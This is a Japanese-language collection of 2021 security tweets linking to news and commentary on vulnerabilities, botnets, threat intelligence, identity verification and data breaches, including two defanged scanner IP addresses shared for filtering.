「 内閣官房内閣サイバーセキュリティセンター(NISC)は、サイバーセキュリティ対策において参照すべき関係法令をQ&A形式で解説する「サイバーセキュリティ関係法令Q&Aハンドブック」…を作成」 「サイバーセキュリティ関係法令Q&Aハンドブック」について https://t.co/Ths6QKrVof
— Takuji Hashizume (@takujihashizume) Oct 15, 2021
先日修正された脆弱性とは別のゼロデイがExchange Serverに。 https://t.co/0WHx0PJB1Y
— Yosuke HASEGAWA (@hasegawayosuke) Oct 16, 2021
<世界サイバー情勢>中国のサイバーセキュリティ会社数は驚異的、71.2万社(2021年9月末。出典:「企査査」レポート)。過去10年のサイバーセキュリティ関連企業の新規設立数の推移は、2020年は爆増で、19.5万社が生まれ、昨対112.7%増。これがどう言う意味かを考えることが大切 https://t.co/wCvPsTDLHN
— ニノミヤ・ヒデキ/二宮英樹(Orient, N&A, CIKF, CEEDSA) (@spike16407200) Oct 16, 2021
「ドナルド・トランプを大統領にしたフェイクニュースネットワークの運営者「ハッカーX」はなぜ今自分の正体を明かしたのか?」 https://t.co/C3WvmNFkHf
— キタきつね (@foxbook) Oct 16, 2021
CTIの目的は外部から得た脅威情報から自組織のリスクを正しく評価し、意思決定者に適切に伝えresilienceを高める態勢を強化すること #転記 - そのため攻撃者の帰属特定は重要でない(事もある) - malware解析によるCTI収集にThreat Pursuit VMやREMnux, Proton VPNがおすすめ https://t.co/tAEJLERL0P
— ken\d|\x (@ken5scal) Oct 17, 2021
「スタバMac」がいよいよ危ない時代が到来? PC画面のテキストを簡単にコピーできる技術に戦慄する声 最近のOCRの精度ってこのレベルになってるんですね。 https://t.co/bIrKpMzw4U
— モグ|セキュリティゼネラリスト (@moneymog) Oct 17, 2021
2021/10/3 セキュリティ関連Twitterメモ
Meris botnet について、MikroTik のコメント。新しい脆弱性があるというわけではないらしい。2018年の Chimay Red 脆弱性 (Hajime が悪用してたやつ) のパッチ適用前にパスワードぬかれてて、変更してないんじゃないかとのこと。 M?ris botnet information - MikroTik https://t.co/xpZlEkYi4z
— Masafumi Negishi (@MasafumiNegishi) Sep 11, 2021
JNSA事業コンプライアンス部会でレポート公開しました。3部作で、想定読者は下記。 1.ランサムウェアの被害が気になる → Part1 2.脅威インテリジェンスサービスを利用したい・している → Part2 3.法執行機関に協力するセキュリティベンダー → Part3 https://t.co/nhcDhJMx0v
— Yusuke Karasawa/ 唐沢勇輔 (@tsukarata) Sep 15, 2021
eKYCを当人認証にしてはいけない。犯収法が身元確認を緩和したのは利便性を優先し不完全を承知のフィクション基準。我々は犯収法界の慣習である限り生暖かく見守った。だがこれを高精度の顔認証だ空港や口座開設と同じだと虚偽の宣伝が始まり政治が動いたので看過できない。直ちに虚偽の宣伝を止めよ。 https://t.co/kSKBR5cM0k
— Hiromitsu Takagi (@HiromitsuTakagi) Sep 15, 2021
トヨタの販売会社 本人の同意得ずに個人情報を目的外使用 #nhk_news https://t.co/VPk86R8Er2
— NHKニュース (@nhk_news) Sep 15, 2021
警視庁トップ交代、大石新総監「サイバー対策に力」|TBS NEWS https://t.co/4SHE6Y952h
— Autumn Good (@autumn_good_35) Sep 16, 2021
「iPhoneへのゼロクリック攻撃は一体なぜそんなに危険なのか?」をセキュリティ研究者が分かりやすく解説 https://t.co/l7FWe7ry1i
— キタきつね (@foxbook) Sep 16, 2021
> FIDO(Fast IDentity Online)規格に準拠した認証サービスを提供する「FIDO認証」、「顔認証」、「指紋認証」、「静脈認証」、「虹彩認証」、そして動物対象の「動物」に分類されます。 このドキュメントも個人的にはあんまり... https://t.co/bF5tCc8QII
— ??秋田の猫?? (@ritou) Sep 21, 2021
JR東日本はまず、直ちにこの「顔認証機能」と称する虚偽の説明をやめよ。どこにも認証機能など存在しない。 このような用語誤用の蔓延が、ついには先週の渋谷区のような虚偽宣伝をもたらしている。 (上の英語ではfacial recognitionと正しく書かれている。) https://t.co/sKFgGTKinh
— Hiromitsu Takagi (@HiromitsuTakagi) Sep 21, 2021
『特殊詐欺に使われたIP電話回線をめぐり、警視庁から契約者について照会を受けた際、回答時に架空の人物の名義で偽造した契約書や免許証の写しを提出』 IP回線の販売業者、捜査照会に偽造契約書や免許証を回答した疑い:朝日新聞デジタル https://t.co/7gUDp4PBV3
— Autumn Good (@autumn_good_35) Sep 24, 2021
「サプライチェーン攻撃」の3種の弱点につけ込む攻撃が顕在化、トレンドマイクロ解説 https://t.co/IX14hC1SfR
— キタきつね (@foxbook) Sep 25, 2021
SOCアナリストによるWAF解説 | 調査研究/ブログ | 三井物産セキュアディレクション株式会社 https://t.co/S9c3X9lRDN
— piyokango (@piyokango) Oct 1, 2021
安全で高速な開発プロセスを実現するセキュリティテスティングツール「komabato」を本日リリースしました! 開発プロセスで簡単・手軽にセキュリティテストを実現するクラウドサービスです。脆弱性の検出だけでなく修正までトータルで支援します。 ▼詳細はこちら https://t.co/ElNum6Ok7v
— UBsecure(株式会社ユービーセキュア) (@UBsecure) Oct 1, 2021
「9月末でLet's Encryptのルート証明書が片方期限切れになるって騒ぎになってるけど、うちはもう片方が既に信頼済みCAとして登録してあるのを確認したから大丈夫!」って安心してた人の一部が今頃大騒ぎしてると思うので情報流しておきますね。 https://t.co/MSWKgUKsAD
— 嶋田大貴 (@shimariso) Sep 30, 2021
Azure AD AutologonのBruteforce Attackをするためのツール。 参考記事によると、少なくとも今週頭の時点では対策されていないようなので、Azure ADを使用している場合は要注意ですね。 最近Azure ADを対象とした攻撃ツールが増えてきましたね。 https://t.co/queVBJeDJM
— daem0nc0re (@daem0nc0re) Oct 1, 2021
脅威インテリジェンスにおけるIPアドレスの取扱 GDPR対個人情報保護法(令和2年改正法-個人関連情報) - IT Research Art https://t.co/H50EfOsOMH
— piyokango (@piyokango) Oct 1, 2021
今日からできるサイバー脅威インテリジェンスの話-実践編- - NFLabs. エンジニアブログ https://t.co/zQssmyqRad
— motter (@CyberAnalitica) Oct 1, 2021
2021/9/15 セキュリティ関連Twitterメモ
— Neutral8?9eR (@0x009AD6_810) Aug 24, 2021
IIJ のハニーポットでも Realtek SDK の管理インタフェースの脆弱性を狙う攻撃を 8/22 から観測しています。複数の攻撃者による Mirai 亜種の感染試行で、formWsc と formSysCmd へのコマンドインジェクションが利用さています。Loader ではなく Bot 自身による攻撃ですが、まだ観測数は少ない状況。 https://t.co/rWdTLruvq7
— Masafumi Negishi (@MasafumiNegishi) Aug 24, 2021
クラウド型WAFサービス「Scutum」、独自開発した手法の追加でウェブサイトへの攻撃の検知精度を大幅向上(アスキー) #Yahooニュース https://t.co/OoDrT5OJMI
— Kanatoko (@kinyuka) Aug 26, 2021
iPhoneの「BlastDoor」も破るゼロクリック攻撃を研究者が確認 - ITmedia NEWS https://t.co/Fur9hhKMVx
— piyokango (@piyokango) Aug 25, 2021
この解説記事、解説だと思って読むと、サラッととんでもない新事実が書かれてる。1面スクープ並みの新事案発生じゃないの? https://t.co/4khOA7rsya https://t.co/TsLmEkT6LN
— Hiromitsu Takagi (@HiromitsuTakagi) Aug 26, 2021
サイバー攻撃が激化する今、「CSIRT」を学び直す 有効な2つのドキュメントとは? https://t.co/PJGfgVHiTV
— にゃん☆たく (@taku888infinity) Aug 31, 2021
システム障害とシステム侵入型ランサムとは、全く別の脅威であり、システムの安定稼働のための冗長化やバックアップと、破壊からの再構築のための復元手段とバックアップとは異なることを組織のセキュリティ担当・システム担当は強く意識し、双方の対策は峻別して考える必要がある https://t.co/Yubr90ctsK
— moto_sato (@58_158_177_102) Sep 3, 2021
顧客への DDoS 攻撃に対応しようとして Arbor のルールを更新したら、なぜか大規模な通信障害になったということらしい。 "Based on initial investigations it was this rule change that disrupted service to a range of Vocus customers. " Network Status | Vocus https://t.co/rFJrxIyhBE
— Masafumi Negishi (@MasafumiNegishi) Sep 3, 2021
はてなブログに投稿しました #はてなブログ 出遅れましたが、せっかく参加してきたのでWriteupを書きました。 #setodaNoteCTF setodaNote CTF Writeup - セキュリティ猫の備忘録 https://t.co/dGRkAVmsfV
— セキュリティ猫 (@nekochanSec555) Sep 6, 2021
Arcadyan製ファームウェアを搭載するルータ製品の脆弱性が7月下旬にJVNで公開されていますが(https://t.co/JYKKvsAy82)NICTERのハニーポットでは8月4日以降この脆弱性を悪用する攻撃を観測し,引き続き現在も攻撃を観測しています. https://t.co/IWMixb2HWH
— NICTER 解析チーム (@nicter_jp) Sep 6, 2021
SOC では Microsoft Exchange Server の脆弱性(ProxyShell、CVE-2021-34473)を狙った調査通信の増加を観測してますのでご注意ください。特に以下の IP アドレスからの通信が発生していますので、フィルタリングやログ調査にご活用ください。 45.155.204[dot]227 185.56.83[dot]80
— NTT Ltd. Japanese (@GlobalNTT_JP) Sep 6, 2021
『セキュリティーを高めるため、外部に情報が漏れないよう専用のデータセンターを設けることも検討する。』 <独自>警察・消防などに共同通信システム整備 政府、民間の携帯電話網を https://t.co/2dh9D3mmJQ
— Autumn Good (@autumn_good_35) Sep 7, 2021
アメリカサイバー軍が「Atlassian Confluenceの重大な脆弱性の修正パッチを今すぐ適用すべき」と警告 - GIGAZINE https://t.co/mhpXpHEXMw
— にゃん☆たく (@taku888infinity) Sep 8, 2021
Ghostscript zero-day allows full server compromises https://t.co/wJEiirg2CT
— Autumn Good (@autumn_good_35) Sep 8, 2021
OWASP Top 10 2021年版、目次部分の前半ざっくりと日本語に訳しました。 https://t.co/DDE915gfvH
— Yosuke HASEGAWA (@hasegawayosuke) Sep 9, 2021
明日は我が身・・・。 「サイバーセキュリティ専門家の大多数に影響を与えるストレスと燃え尽き症候群」 https://t.co/JJgsmk97uU
— キタきつね (@foxbook) Sep 9, 2021
悪意のあるアクターがFortiGate SSL-VPNの認証情報を公開 https://t.co/hbl7qQyLgP
— piyokango (@piyokango) Sep 9, 2021
五輪・パラ大会中のテロやサイバー攻撃なし、中核派ら12人を摘発 https://t.co/4n4IQZVXSR
— piyokango (@piyokango) Sep 9, 2021
2021年4月5-7日に、国連がサイバー攻撃によりNWに侵入され、大量の機微文書が漏洩していた。ダークネットで売買されていた被雇用者の認証情報が使用された。初期侵入口は独自管理システムのUmojaで、二要素認証対応は7月だったため、攻撃当時は二要素認証ではなかった模様。 https://t.co/SqiFr4MIT2
— kokum?t? (@__kokumoto) Sep 10, 2021